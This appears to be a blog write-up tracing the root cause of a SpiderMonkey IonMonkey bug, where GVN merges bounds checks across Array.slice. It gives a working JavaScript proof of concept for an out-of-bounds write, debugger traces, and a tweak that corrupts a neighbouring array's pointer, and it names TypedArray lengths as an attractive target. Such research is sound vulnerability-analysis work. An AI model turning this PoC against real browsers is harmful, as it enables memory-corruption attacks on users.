To understand what is going on well we need two things: the alias summary spew to see the dependencies and the MIR code before the GVN pass has run. Here is the alias summary spew from vulnerable version:

Non patched:
[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  slots13 marked depending on start6
[AliasSummaries]  loadslot14 marked depending on start6
[AliasSummaries]  elements17 marked depending on start6
[AliasSummaries]  initializedlength18 marked depending on start6
[AliasSummaries]  elements25 marked depending on start6
[AliasSummaries]  arraylength26 marked depending on start6
[AliasSummaries]  slots29 marked depending on start6
[AliasSummaries]  loadslot30 marked depending on start6
[AliasSummaries]  elements32 marked depending on start6
[AliasSummaries]  initializedlength33 marked depending on start6

And here is the MIR code:

MIR

On this diagram I have highlighted the two code regions that we care about. Those two regions are the same which makes sense as they are the MIR code generated by the two statements Arr[Idx] = .. / Arr[Idx] = .... The GVN algorithm iterates through the instructions and eventually evaluates the first 19 | boundscheck instruction. Because it has never seen this expression it records it in case it encounters a similar one in the future. If it does, it might choose to replace one instruction with the other. And so it carries on and eventually hit the other 34 | boundscheck instruction. At this point, it wants to know if 19 and 34 are congruent and the first step to determine that is to evaluate if those two instructions share the same dependency. In the vulnerable version, as you can see in the alias summary spew, those instructions have all the same dependency to start6 which the check is satisfied. The second step is to invoke MBoundsCheck implementation of congruentTo that ensures the two instructions are the same.

  bool congruentTo(const MDefinition* ins) const override {
    if (!ins->isBoundsCheck()) {
      return false;
    }
    const MBoundsCheck* other = ins->toBoundsCheck();
    if (minimum() != other->minimum() || maximum() != other->maximum()) {
      return false;
    }
    if (fallible() != other->fallible()) {
      return false;
    }
    return congruentIfOperandsEqual(other);
  }

Because the algorithm has already ran on the previous instructions, it has already replaced 28 to 33 by 12 to 18. Which means as far as congruentTo is concerned the two instructions are the same and it is safe for Ion to remove 35 and only have one boundscheck instruction in this function. You can also see this in the GVN spew below that I edited just to show the relevant parts:

[GVN] Running GVN on graph (with 1 blocks)
[GVN]   Visiting dominator tree (with 1 blocks) rooted at block0 (normal entry block)
[GVN]     Visiting block0
...
[GVN]       Recording Constant12
[GVN]       Recording Slots13
[GVN]       Recording LoadSlot14
[GVN]       Recording Constant15
[GVN]       Folded ToNumberInt3216 to Unbox10
[GVN]       Discarding dead ToNumberInt3216
[GVN]       Recording Elements17
[GVN]       Recording InitializedLength18
[GVN]       Recording BoundsCheck19
[GVN]       Recording SpectreMaskIndex20

…

[GVN]       Replacing Constant28 with Constant12
[GVN]       Discarding dead Constant28

[GVN]       Replacing Slots29 with Slots13
[GVN]       Discarding dead Slots29

[GVN]       Replacing LoadSlot30 with LoadSlot14
[GVN]       Discarding dead LoadSlot30

[GVN]       Folded ToNumberInt3231 to Unbox10
[GVN]       Discarding dead ToNumberInt3231

[GVN]       Replacing Elements32 with Elements17
[GVN]       Discarding dead Elements32

[GVN]       Replacing InitializedLength33 with InitializedLength18
[GVN]       Discarding dead InitializedLength33

[GVN]       Replacing BoundsCheck34 with BoundsCheck19
[GVN]       Discarding dead BoundsCheck34

[GVN]       Replacing SpectreMaskIndex35 with SpectreMaskIndex20
[GVN]       Discarding dead SpectreMaskIndex35

Wow, we did it: from the alias analysis to the GVN and followed along the redundancy elimination.

Now if we have a look at the alias summary spew for a fixed version of Ion this is what we see:

Patched:
[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  slots13 marked depending on start6
[AliasSummaries]  loadslot14 marked depending on start6
[AliasSummaries]  elements17 marked depending on start6
[AliasSummaries]  initializedlength18 marked depending on start6
[AliasSummaries]  elements25 marked depending on start6
[AliasSummaries]  arraylength26 marked depending on start6
[AliasSummaries]  slots29 marked depending on arrayslice27
[AliasSummaries]  loadslot30 marked depending on arrayslice27
[AliasSummaries]  elements32 marked depending on arrayslice27
[AliasSummaries]  initializedlength33 marked depending on arrayslice27

In this case, the two regions of code have a different dependency; the first block depends on start6 as above, but the second is now dependent on arrayslice27. This makes instructions not congruent and this is the very thing that prevents GVN from replacing the second region by the first one :).

Reaching state of no unknowns

Now that we finally understand what is going on, let's keep pushing until we reach what I call the state of no unknowns. What I mean by that is simply to be able to explain every little detail of the PoC and be in full control of it.

And at the end of the day, there is no magic. It's just code and the truth is out there :).

At this point this is the PoC I am trying to demystify a bit more (if you want to follow along) this is the one:

let Trigger = false;
let Arr = null;

function Target(Special, Idx, Value) {
    Arr[Idx] = 0x41414141;
    Special.slice();
    Arr[Idx] = Value;
}

class SoSpecial extends Array {
    static get [Symbol.species]() {
        return function() {
            if(!Trigger) {
                return;
            }

            Arr.length = 0;
            gc();
        };
    }
};

function main() {
    const Snowflake = new SoSpecial();
    Arr = new Array(0x7e);
    for(let Idx = 0; Idx < 0x400; Idx++) {
        Target(Snowflake, 0x30, Idx);
    }

    Trigger = true;
    Target(Snowflake, 0x20, 0xBB);
}

main();

In the following sections we walk through various aspects of the PoC, SpiderMonkey and IonMonkey internals in order to gain an even better understanding of all the behaviors at play here. It might be only < 100 lines of code but a lot of things happen :).

Phew, you made it here! I guess it is a good point where people that were only interested in the root-cause of this issue can stop reading: we have shed enough light on the vulnerability and its roots. For the people that want more though, and that still have a lot of questions like 'why is this working and this is not', 'why is it not crashing reliably' or 'why does this line matters' then fasten your seat belt and let's go!

The Nursery

The first stop is to explain in more detail how one of the three heap allocators in Spidermonkey works: the Nursery.

The Nursery is actually, for once, a very simple allocator. It is useful and important to know how it is designed as it gives you natural answers to the things it is able to do and the thing it cannot (by design).

The Nursery is specific to a JSRuntime and by default has a maximum size of 16MB (you can tweak the size with --nursery-size with the JavaScript shell js.exe). The memory is allocated by VirtualAlloc (by chunks of 0x100000 bytes PAGE_READWRITE memory) in js::gc::MapAlignedPages and here is an example call-stack:

 # Call Site
00 KERNELBASE!VirtualAlloc
01 js!js::gc::MapAlignedPages
02 js!js::gc::GCRuntime::getOrAllocChunk
03 js!js::Nursery::init
04 js!js::gc::GCRuntime::init
05 js!JSRuntime::init
06 js!js::NewContext
07 js!main

This contiguous region of memory is called a js::NurseryChunk and the allocator places such a structure there. The js::NurseryChunk starts with the actual usable space for allocations and has a trailer metadata at the end:

const size_t ChunkShift = 20;
const size_t ChunkSize = size_t(1) << ChunkShift;

const size_t ChunkTrailerSize = 2 * sizeof(uintptr_t) + sizeof(uint64_t);

static const size_t NurseryChunkUsableSize =
      gc::ChunkSize - gc::ChunkTrailerSize;

struct NurseryChunk {
  char data[Nursery::NurseryChunkUsableSize];
  gc::ChunkTrailer trailer;

  static NurseryChunk* fromChunk(gc::Chunk* chunk);
  void poisonAndInit(JSRuntime* rt, size_t extent = ChunkSize);
  void poisonAfterSweep(size_t extent = ChunkSize);
  uintptr_t start() const { return uintptr_t(&data); }
  uintptr_t end() const { return uintptr_t(&trailer); }
  gc::Chunk* toChunk(JSRuntime* rt);
};

Every js::NurseryChunk is 0x100000 bytes long (on x64) or 256 pages total and has effectively 0xffe8 usable bytes (the rest is metadata). The allocator purposely tries to fragment those region in the virtual address space of the process (in x64) and so there is not a specific offset in between all those chunks.

The way allocations are organized in this region is pretty easy: say the user asks for a 0x30 bytes allocation, the allocator returns the current position for backing the allocation and the allocator simply bumps its current location by +0x30. The biggest allocation request that can go through the Nursery is 1024 bytes long (defined by js::Nursery::MaxNurseryBufferSize) and if it exceeds this size usually the allocation is serviced from the jemalloc heap (which is the third heap in Firefox: Nursery, Tenured and jemalloc).

When a chunk is full, the Nursery can allocate another one if it hasn't reached its maximum size yet; if it hasn't it sets up a new js::NurseryChunk (as in the above call-stack) and update the current one with the new one. If the Nursery has reached its maximum capacity it triggers a minor garbage collection which collects the objects that needs collection (the one having no references anymore) and move all the objects still alive on the Tenured heap. This gives back a clean slate for the Nursery.

Even though the Nursery doesn't keep track of the various objects it has allocated and because they are all allocated contiguously the runtime is basically able to iterate over the objects one by one and sort out the boundary of the current object and moves to the next. Pretty cool.

While writing up this section I also added a new utility command in sm.js called !in_nursery <addr> that tells you if addr belongs to the Nursery or not. On top of that, it shows you interesting information about its internal state. This is what it looks like:

0:008> !in_nursery 0x19767e00df8
Using previously cached JSContext @0x000001fe17318000
0x000001fe1731cde8: js::Nursery
 ChunkCountLimit: 0x0000000000000010 (16 MB)
        Capacity: 0x0000000000fffe80 bytes
    CurrentChunk: 0x0000019767e00000
        Position: 0x0000019767e00eb0
          Chunks:
            00: [0x0000019767e00000 - 0x0000019767efffff]
            01: [0x00001fa2aee00000 - 0x00001fa2aeefffff]
            02: [0x0000115905000000 - 0x00001159050fffff]
            03: [0x00002fc505200000 - 0x00002fc5052fffff]
            04: [0x000020d078700000 - 0x000020d0787fffff]
            05: [0x0000238217200000 - 0x00002382172fffff]
            06: [0x00003ff041f00000 - 0x00003ff041ffffff]
            07: [0x00001a5458700000 - 0x00001a54587fffff]
-------
0x19767e00df8 has been found in the js::NurseryChunk @0x19767e00000!

Understanding what happens to Arr

The first thing that was bothering me is the very specific number of items the array is instantiated with:

Arr = new Array(0x7e);

People following at home will also notice that modifying this constant takes us from a PoC that crashes reliably to... a PoC that may not even crash anymore.

Let's start at the beginning and gather information. This is an array that gets allocated in the Nursery (also called DefaultHeap) with the OBJECT2_BACKGROUND kind which means it is 0x30 bytes long - basically just enough to pack a js::NativeObject (0x20 bytes) as well as a js::ObjectElements (0x10 bytes):

0:000> ?? sizeof(js!js::NativeObject) + sizeof(js!js::ObjectElements)
unsigned int64 0x30

0:000> r
js!js::AllocateObject<js::CanGC>:
00007ff7`87ada9b0 4157            push    r15

0:000> ?? kind
js::gc::AllocKind OBJECT2_BACKGROUND (0n5)

0:000> x js!js::gc::Arena::ThingSizes
00007ff7`88133fe0 js!js::gc::Arena::ThingSizes = <no type information>

0:000> dds 00007ff7`88133fe0 + (5 * 4) l1
00007ff7`88133ff4  00000030

0:000> kc
 # Call Site
00 js!js::AllocateObject<js::CanGC>
01 js!js::ArrayObject::createArray
02 js!NewArrayTryUseGroup<2046>
03 js!ArrayConstructorImpl
04 js!js::ArrayConstructor
05 js!InternalConstruct
06 js!Interpret
07 js!js::RunScript
08 js!js::ExecuteKernel
09 js!js::Execute
0a js!JS_ExecuteScript
0b js!Process
0c js!main
0d js!__scrt_common_main_seh
0e KERNEL32!BaseThreadInitThunk
0f ntdll!RtlUserThreadStart

You might be wondering where is the space for the 0x7e elements though? Well, once the shell of the object is constructed, it grows the elements_ space to be able to store that many elements. The number of elements is being adjusted in js::NativeObject::goodElementsAllocationAmount to 0x80 (which is coincidentally the biggest allocation that the Nursery can service as we've seen in the previous section: 0x400 bytes)) and then js::NativeObject::growElements calls into the Nursery allocator to allocate 0x80 * sizeof(JS::Value) = 0x400 bytes:

0:000> 
js!js::NativeObject::goodElementsAllocationAmount+0x264:
00007ff6`e5dbfae4 418909          mov     dword ptr [r9],ecx ds:00000028`cc9fe9ac=00000000

0:000> r @ecx
ecx=80

0:000> kc
 # Call Site
00 js!js::NativeObject::goodElementsAllocationAmount
01 js!js::NativeObject::growElements
02 js!NewArrayTryUseGroup<2046>
03 js!ArrayConstructorImpl
04 js!js::ArrayConstructor
05 js!InternalConstruct
06 js!Interpret
07 js!js::RunScript
08 js!js::ExecuteKernel
09 js!js::Execute
0a js!JS_ExecuteScript
0b js!Process
0c js!main

...

0:000> t
js!js::Nursery::allocateBuffer:
00007ff6`e6029c70 4156            push    r14

0:000> r @r8
r8=0000000000000400

0:000> kc
 # Call Site
00 js!js::Nursery::allocateBuffer
01 js!js::NativeObject::growElements
02 js!NewArrayTryUseGroup<2046>
03 js!ArrayConstructorImpl
04 js!js::ArrayConstructor
05 js!InternalConstruct
06 js!Interpret
07 js!js::RunScript
08 js!js::ExecuteKernel
09 js!js::Execute
0a js!JS_ExecuteScript
0b js!Process
0c js!main

Once the allocation is done, it copies the old elements_ content into the new one, updates the Array object and we are done with our Array:

0:000> dt js::NativeObject @r14 elements_
   +0x018 elements_        : 0x000000c9`ffb000f0 js::HeapSlot

0:000> dqs @r14
000000c9`ffb000b0  00002bf2`fa07deb0
000000c9`ffb000b8  00002bf2`fa0987e8
000000c9`ffb000c0  00000000`00000000
000000c9`ffb000c8  000000c9`ffb000f0
000000c9`ffb000d0  00000000`00000000 <- Lost / unused space
000000c9`ffb000d8  0000007e`00000000 <- Lost / unused space
000000c9`ffb000e0  00000000`00000000
000000c9`ffb000e8  0000007e`0000007e

000000c9`ffb000f0  2f2f2f2f`2f2f2f2f
000000c9`ffb000f8  2f2f2f2f`2f2f2f2f
000000c9`ffb00100  2f2f2f2f`2f2f2f2f
000000c9`ffb00108  2f2f2f2f`2f2f2f2f
000000c9`ffb00110  2f2f2f2f`2f2f2f2f
000000c9`ffb00118  2f2f2f2f`2f2f2f2f
000000c9`ffb00120  2f2f2f2f`2f2f2f2f
000000c9`ffb00128  2f2f2f2f`2f2f2f2f

One small remark is that because we first allocated 0x30 bytes, we originally had the js::ObjectElements at 000000c9ffb000d0. Because we needed a bigger space, we allocated space for 0x7e elements and two more JS::Value (in size) to be able to store the new js::ObjectElements (this object is always right before the content of the array). The result of this is the old js::ObjectElements at 000000c9ffb000d0/8 is now unused / lost space; which is kinda fun I suppose :).

Array allocation

This is also very similar to what happens when we trigger the Arr.length = 0 statement; the Nursery allocator is invoked to replace the to-be-shrunk elements_ array. This is implemented in js::NativeObject::shrinkElements. This time 8 (which is the minimum and is defined as js::NativeObject::SLOT_CAPACITY_MIN) is returned by js::NativeObject::goodElementsAllocationAmount which results in an allocation request of 8*8=0x40 bytes from the Nursery. js::Nursery::reallocateBuffer decides that this is a no-op because the new size (0x40) is smaller than the old one (0x400) and because the chunk is backed by a Nursery buffer:

void* js::Nursery::reallocateBuffer(JSObject* obj, void* oldBuffer,
                                    size_t oldBytes, size_t newBytes) {
  // ...
  /* The nursery cannot make use of the returned slots data. */
  if (newBytes < oldBytes) {
    return oldBuffer;
  }
  // ...
}

And as a result, our array basically stays the same; only the js::ObjectElement part is updated:

0:000> !smdump_jsobject 0x00000c9ffb000b0
c9ffb000b0: js!js::ArrayObject:            Length: 0 <- Updated length
c9ffb000b0: js!js::ArrayObject:          Capacity: 6 <- This is js::NativeObject::SLOT_CAPACITY_MIN - js::ObjectElements::VALUES_PER_HEADER
c9ffb000b0: js!js::ArrayObject: InitializedLength: 0
c9ffb000b0: js!js::ArrayObject:           Content: []
@$smdump_jsobject(0x00000c9ffb000b0)

0:000> dt js::NativeObject 0x00000c9ffb000b0 elements_
   +0x018 elements_ : 0x000000c9`ffb000f0 js::HeapSlot

Now if you think about it we are able to store arbitrary values in out-of-bounds memory. We fully control the content, and we somewhat control the offset (up to the size of the initial array). But how can we overwrite actually useful data?

Sure we can make sure to have our array followed by something interesting. Although,if you think about it, we will shrink back the array length to zero and then trigger the vulnerability. Well, by design the object we placed behind us is not reachable by our index because it was precisely adjacent to the original array. So this is not enough and we need to find a way to have the shrunken array being moved into a region where it gets adjacent with something interesting. In this case we will end up with interesting corruptible data in the reach of our out-of-bounds.

A minor-gc should do the trick as it walks the Nursery, collects the objects that needs collection and moves all the other ones to the Tenured heap. When this happens, it is fair to guess that we get moved to a memory chunk that can just fit the new object.

Code generation with IonMonkey

Before beginning, one thing that you might have been wondering at this point is where do we actually check the implementation of the code generation for a given LIR instruction? (MIR gets lowered to LIR and code-generation kicks in to generate native code)

Like how does storeelement get lowered to native code (does MIR storeelement get translated to LIR LStoreElement instruction?) This would be useful for us to know a bit more about the out-of-bounds memory access we can trigger.

You can find those details in what is called the CodeGenerator which lives in src/jit/CodeGenerator.cpp. For example, you can quickly see that most of the code generation related to the arrayslice instruction happens in js::ArraySliceDense:

void CodeGenerator::visitArraySlice(LArraySlice* lir) {
  Register object = ToRegister(lir->object());
  Register begin = ToRegister(lir->begin());
  Register end = ToRegister(lir->end());
  Register temp1 = ToRegister(lir->temp1());
  Register temp2 = ToRegister(lir->temp2());

  Label call, fail;

  // Try to allocate an object.
  TemplateObject templateObject(lir->mir()->templateObj());
  masm.createGCObject(temp1, temp2, templateObject, lir->mir()->initialHeap(),
                      &fail);

  // Fixup the group of the result in case it doesn't match the template object.
  masm.copyObjGroupNoPreBarrier(object, temp1, temp2);

  masm.jump(&call);
  {
    masm.bind(&fail);
    masm.movePtr(ImmPtr(nullptr), temp1);
  }
  masm.bind(&call);

  pushArg(temp1);
  pushArg(end);
  pushArg(begin);
  pushArg(object);

  using Fn =
      JSObject* (*)(JSContext*, HandleObject, int32_t, int32_t, HandleObject);
  callVM<Fn, ArraySliceDense>(lir);
}

Most of the MIR instructions translate one-to-one to a LIR instruction (MIR instructions start with an M like MStoreElement, and LIR instruction starts with an L like LStoreElement); there are about 309 different MIR instructions (see objdir/js/src/jit/MOpcodes.h) and 434 LIR instructions (see objdir/js/src/jit/LOpcodes.h).

The function jit::CodeGenerator::visitArraySlice function is directly invoked from js::jit::CodeGenerator in a switch statement dispatching every LIR instruction to its associated handler (note that I have cleaned-up the function below by removing a bunch of useless ifdef blocks for our investigation):

bool CodeGenerator::generateBody() {
  JitSpew(JitSpew_Codegen, "==== BEGIN CodeGenerator::generateBody ====\n");
  IonScriptCounts* counts = maybeCreateScriptCounts();

  for (size_t i = 0; i < graph.numBlocks(); i++) {
    current = graph.getBlock(i);

    // Don't emit any code for trivial blocks, containing just a goto. Such
    // blocks are created to split critical edges, and if we didn't end up
    // putting any instructions in them, we can skip them.
    if (current->isTrivial()) {
      continue;
    }

    masm.bind(current->label());

    mozilla::Maybe<ScriptCountBlockState> blockCounts;
    if (counts) {
      blockCounts.emplace(&counts->block(i), &masm);
      if (!blockCounts->init()) {
        return false;
      }
    }
    TrackedOptimizations* last = nullptr;

    for (LInstructionIterator iter = current->begin(); iter != current->end();
         iter++) {
      if (!alloc().ensureBallast()) {
        return false;
      }

      if (counts) {
        blockCounts->visitInstruction(*iter);
      }

      if (iter->mirRaw()) {
        // Only add instructions that have a tracked inline script tree.
        if (iter->mirRaw()->trackedTree()) {
          if (!addNativeToBytecodeEntry(iter->mirRaw()->trackedSite())) {
            return false;
          }
        }

        // Track the start native offset of optimizations.
        if (iter->mirRaw()->trackedOptimizations()) {
          if (last != iter->mirRaw()->trackedOptimizations()) {
            DumpTrackedSite(iter->mirRaw()->trackedSite());
            DumpTrackedOptimizations(iter->mirRaw()->trackedOptimizations());
            last = iter->mirRaw()->trackedOptimizations();
          }
          if (!addTrackedOptimizationsEntry(
                  iter->mirRaw()->trackedOptimizations())) {
            return false;
          }
        }
      }

      setElement(*iter);  // needed to encode correct snapshot location.

      switch (iter->op()) {
#ifndef JS_CODEGEN_NONE
#  define LIROP(op)              \
    case LNode::Opcode::op:      \
      visit##op(iter->to##op()); \
      break;
        LIR_OPCODE_LIST(LIROP)
#  undef LIROP
#endif
        case LNode::Opcode::Invalid:
        default:
          MOZ_CRASH("Invalid LIR op");
      }

      // Track the end native offset of optimizations.
      if (iter->mirRaw() && iter->mirRaw()->trackedOptimizations()) {
        extendTrackedOptimizationsEntry(iter->mirRaw()->trackedOptimizations());
      }
    }
    if (masm.oom()) {
      return false;
    }
  }

  JitSpew(JitSpew_Codegen, "==== END CodeGenerator::generateBody ====\n");
  return true;
}

After theory, let's practice a bit and try to apply all of this learning against the PoC file.

Here is what I would like us to do: let's try to break into the assembly code generated by Ion for the function Target. Then, let's find the boundscheck so that we can trace forward and witness every step of the bug:

  1. Check Idx against the initializedLength of the array
  2. Storing the integer 0x41414141 inside the array's elements_ memory space
  3. Calling slice on Special and making sure the size of Arr has been shrunk and that it is now 0
  4. Finally, witnessing the out-of-bounds store

Before diving in, here is the code that generates the assembly code for the boundscheck instruction:

void CodeGenerator::visitBoundsCheck(LBoundsCheck* lir) {
  const LAllocation* index = lir->index();
  const LAllocation* length = lir->length();
  LSnapshot* snapshot = lir->snapshot();

  if (index->isConstant()) {
    // Use uint32 so that the comparison is unsigned.
    uint32_t idx = ToInt32(index);
    if (length->isConstant()) {
      uint32_t len = ToInt32(lir->length());
      if (idx < len) {
        return;
      }
      bailout(snapshot);
      return;
    }

    if (length->isRegister()) {
      bailoutCmp32(Assembler::BelowOrEqual, ToRegister(length), Imm32(idx),
                   snapshot);
    } else {
      bailoutCmp32(Assembler::BelowOrEqual, ToAddress(length), Imm32(idx),
                   snapshot);
    }
    return;
  }

  Register indexReg = ToRegister(index);
  if (length->isConstant()) {
    bailoutCmp32(Assembler::AboveOrEqual, indexReg, Imm32(ToInt32(length)),
                 snapshot);
  } else if (length->isRegister()) {
    bailoutCmp32(Assembler::BelowOrEqual, ToRegister(length), indexReg,
                 snapshot);
  } else {
    bailoutCmp32(Assembler::BelowOrEqual, ToAddress(length), indexReg,
                 snapshot);
  }
}

According to the code above, we can expect to have a cmp instruction emitted with two registers: the index and the length, as well as a conditional branch for bailing out if the index is bigger than the length. In our case, one thing to keep in mind is that the length is the initializedLength of the array and not the actual length as you can see in the MIR code:

18 | initializedlength elements17:Elements
19 | boundscheck unbox10:Int32 initializedlength18:Int32

Now let's get back to observing the PoC in action. One easy way that I found to break in a function generated by Ion right before it adds the native code for a specific LIR instruction is to set a breakpoint in the code generator for the instruction of your choice (or on js::jit::CodeGenerator::generateBody if you want to break at the entry point of the function) and then modify its internal buffer in order to add an int3 in the generated code.

This is another command that I added to sm.js called !ion_insertbp.

Check Idx against the initializedLength of the array

In our case, we are interested to break right before the boundscheck so let's set a breakpoint on js!js::jit::CodeGenerator::visitBoundsCheck, invoke !ion_insertbp and then we should be off to the races:

0:008> g
Breakpoint 0 hit
js!js::jit::CodeGenerator::visitBoundsCheck:
00007ff6`e62de1a0 4156            push    r14

0:000> !ion_insertbp
unsigned char 0xcc ''
unsigned int64 0xff
@$ion_insertbp()

0:000> g
(224c.2914): Break instruction exception - code 80000003 (first chance)
0000035c`97b8b299 cc              int     3

0:000> u . l2
0000035c`97b8b299 cc              int     3
0000035c`97b8b29a 3bd9            cmp     ebx,ecx

0:000> t
0000035c`97b8b29a 3bd9            cmp     ebx,ecx

0:000> r.
ebx=00000000`00000031  ecx=00000000`00000030  

Sweet; this cmp is basically the boundscheck instruction that compares the initializedLength (0x31) of the array (because we initialized Arr[0x30] a bunch of times when warming-up the JIT) to Idx which is 0x30. The index is in bounds and so the code doesn't bailout and keeps going forward.

Storing the integer 0x41414141 inside the array's elements_ memory space

If we trace a little further we can see the code generated that loads the integer 0x41414141 into the array at the index 0x30:

0:000> 
0000035c`97b8b2ad 49bb414141410080f8ff mov r11,0FFF8800041414141h

0:000> 
0000035c`97b8b2b7 4c891cea        mov     qword ptr [rdx+rbp*8],r11 ds:000031ea`c7502348=fff88000000003e6

0:000> r @rdx,@rbp
rdx=000031eac75021c8 rbp=0000000000000030

And then the invocation of slice:

0:000>
0000035c`97b8b34b e83060ffff      call    0000035c`97b81380

0:000> t
00000289`d04b1380 48b9008021d658010000 mov rcx,158D6218000h

0:000> u . l20
...
0000035c`97b813c6 e815600000      call    0000035c`97b873e0

0:000> u 0000035c`97b873e0 l1
0000035c`97b873e0 ff2502000000    jmp     qword ptr [0000035c`97b873e8]

0:000> dqs 0000035c`97b873e8 l1
0000035c`97b873e8  00007ff6`e5c642a0 js!js::ArraySliceDense [c:\work\codes\mozilla-central\js\src\builtin\Array.cpp @ 3637]

Calling slice on Special

Then, making sure we triggered the side-effect and shrunk Arr right after the slicing operation (note that I added code in the PoC to print the address of Arr before and after the gc call otherwise we would have no way of getting its address). To witness that we have to do some more work to break on the right iteration (when Trigger is set to True) otherwise the function doesn't shrink Arr. This is to ensure that we warmed-up the JIT enough and that the function has been JIT'ed.

An easy way to break at the right iteration is by looking for something unique about it, like the fact that we use a different index: 0x20 instead of 0x30. For example, we can easily detect that with a breakpoint as below (on the cmp instruction for the boundscheck instruction):

0:000> bp 0000035c`97b8b29a ".if(@ecx == 0x20){}.else{gc}"

0:000> eb 0000035c`97b8b299 90

0:000> g
0000035c`97b8b29a 3bd9            cmp     ebx,ecx

0:000> r.
ebx=00000000`00000031  ecx=00000000`00000020  

Now we can head straight-up to js::ArraySliceDense:

0:000> g js!js::ArraySliceDense+0x40d
js!js::ArraySliceDense+0x40d:
00007ff6`e5c646ad e8eee2ffff      call    js!js::array_slice (00007ff6`e5c629a0)

0:000> ? 000031eac75021c8 - (2*8) - (2*8) - 20
Evaluate expression: 54884436025736 = 000031ea`c7502188

0:000> !smdump_jsobject 0x00031eac7502188
31eac7502188: js!js::ArrayObject:            Length: 126
31eac7502188: js!js::ArrayObject:          Capacity: 126
31eac7502188: js!js::ArrayObject: InitializedLength: 49
31eac7502188: js!js::ArrayObject:           Content: [magic, magic, magic, magic, magic, magic, magic, magic, magic, magic, ...]
@$smdump_jsobject(0x00031eac7502188)

0:000> p
js!js::ArraySliceDense+0x412:
00007ff6`e5c646b2 48337c2450      xor     rdi,qword ptr [rsp+50h] ss:000000bd`675fd270=fffe2d69e5e05100

We grab the address of the array after the gc on stdout and let's see (the array got moved from 0x00031eac7502188 to 0x0002B0A9D08F160):

0:000> !smdump_jsobject 0x0002B0A9D08F160
2b0a9d08f160: js!js::ArrayObject:            Length: 0
2b0a9d08f160: js!js::ArrayObject:          Capacity: 6
2b0a9d08f160: js!js::ArrayObject: InitializedLength: 0
2b0a9d08f160: js!js::ArrayObject:           Content: []
@$smdump_jsobject(0x0002B0A9D08F160)

Witnessing the out-of-bounds store

And now the last stop is to observe the actual out-of-bounds happening.

0:000> 
0000035c`97b8b35d 8914c8          mov     dword ptr [rax+rcx*8],edx ds:00002b0a`9d08f290=4f4f4f4f

0:000> r.
rcx=00000000`00000020  rax=00002b0a`9d08f190  edx=00000000`000000bb

0:000> t
0000035c`97b8b360 c744c8040080f8ff mov     dword ptr [rax+rcx*8+4],0FFF88000h ds:00002b0a`9d08f294=4f4f4f4f

In the above @rax is the elements_ pointer that has a capacity of only 6 js::Value which means the only possible values of the index (@edx here) should be in [0 - 5]. In summary, we are able to write an integer js::Value which means we can control the lower 4 bytes but cannot control the upper 4 (that will be FFF88000). Thus, an ideal corruption target (doesn't mean this is the only thing we could do either) for this primitive is a size of an array like structure that is stored as a js::Value. Turns out this is exactly how the size of TypedArrays are stored - if you don't remember go have a look at my previous article Introduction to SpiderMonkey exploitation :).

In our case, if we look at the neighboring memory we find another array right behind us:

0:000> dqs 0x0002B0A9D08F160 l100
00002b0a`9d08f160  00002b0a`9d07dcd0
00002b0a`9d08f168  00002b0a`9d0987e8
00002b0a`9d08f170  00000000`00000000
00002b0a`9d08f178  00002b0a`9d08f190
00002b0a`9d08f180  00000000`00000000
00002b0a`9d08f188  00000000`00000006
00002b0a`9d08f190  fffa8000`00000000
00002b0a`9d08f198  fffa8000`00000000
00002b0a`9d08f1a0  fffa8000`00000000
00002b0a`9d08f1a8  fffa8000`00000000
00002b0a`9d08f1b0  fffa8000`00000000
00002b0a`9d08f1b8  fffa8000`00000000

00002b0a`9d08f1c0  00002b0a`9d07dc40 <- another array starting here
00002b0a`9d08f1c8  00002b0a`9d098890
00002b0a`9d08f1d0  00000000`00000000
00002b0a`9d08f1d8  00002b0a`9d08f1f0 <- elements_
00002b0a`9d08f1e0  00000000`00000000
00002b0a`9d08f1e8  00000000`00000006
00002b0a`9d08f1f0  2f2f2f2f`2f2f2f2f
00002b0a`9d08f1f8  2f2f2f2f`2f2f2f2f
00002b0a`9d08f200  2f2f2f2f`2f2f2f2f
00002b0a`9d08f208  2f2f2f2f`2f2f2f2f
00002b0a`9d08f210  2f2f2f2f`2f2f2f2f
00002b0a`9d08f218  2f2f2f2f`2f2f2f2f

So one way to get the interpreter to crash reliably is to overwrite its elements_ with a js::Value. It is guaranteed that this should crash the interpreter when it tries to collect the elements_ buffer as it won't even be a valid pointer. This field is reachable with the index 9 and so we just have to modify this line:

    Target(Snowflake, 0x9, 0xBB);

And tada:

(d0.348c): Access violation - code c0000005 (!!! second chance !!!)
js!js::gc::Arena::finalize<JSObject>+0x12e:
00007ff6`e601eb2e 8b43f0          mov     eax,dword ptr [rbx-10h] ds:fff88000`000000ab=????????

0:000> kc
 # Call Site
00 js!js::gc::Arena::finalize<JSObject>
01 js!FinalizeTypedArenas<JSObject>
02 js!FinalizeArenas
03 js!js::gc::ArenaLists::backgroundFinalize
04 js!js::gc::GCRuntime::sweepBackgroundThings
05 js!js::gc::GCRuntime::sweepFromBackgroundThread
06 js!js::GCParallelTaskHelper<js::gc::BackgroundSweepTask>::runTaskTyped
07 js!js::GCParallelTask::runFromMainThread
08 js!js::GCParallelTask::joinAndRunFromMainThread
09 js!js::gc::GCRuntime::endSweepingSweepGroup
0a js!sweepaction::SweepActionSequence<js::gc::GCRuntime *,js::FreeOp *,js::SliceBudget &>::run
0b js!sweepaction::SweepActionRepeatFor<js::gc::SweepGroupsIter,JSRuntime *,js::gc::GCRuntime *,js::FreeOp *,js::SliceBudget &>::run
0c js!js::gc::GCRuntime::performSweepActions
0d js!js::gc::GCRuntime::incrementalSlice
0e js!js::gc::GCRuntime::gcCycle
0f js!js::gc::GCRuntime::collect
10 js!js::gc::GCRuntime::gc
11 js!JSRuntime::destroyRuntime
12 js!js::DestroyContext
13 js!main

Simplifying the PoC

OK so with this internal knowledge that we have gone through, we understand enough of the pieces at play to simplify the PoC. It's always good to verify assumptions in practice and so it'll be a good exercise to see if what we have learned above sticks.

First, we do not need an array of size 0x7e. Because the corruption target that we identified above is reachable at the index 0x20 (remember it's the neighboring array's elements_ field), we need the array to be able to store 0x21 elements. This is just to satisfy the boundscheck before we can shrink it.

We also know that the only role that the 0x30 index constant has been serving is to make sure that the first 0x30 elements in the array have been properly initialized. As the boundscheck operates against the initializedLength of the array, if we try to access at an index higher we will take a bailout. An easy way to not worry about this at all is to initialize entirely the array with a .fill(0) for example. Once this is done we can update the first index and use 0 instead of 0x30.

After all the modifications this is what you end up with:

let Trigger = false;
let Arr = null;

function Target(Special, Idx, Value) {
    Arr[Idx] = 0x41414141;
    Special.slice();
    Arr[Idx] = Value;
}

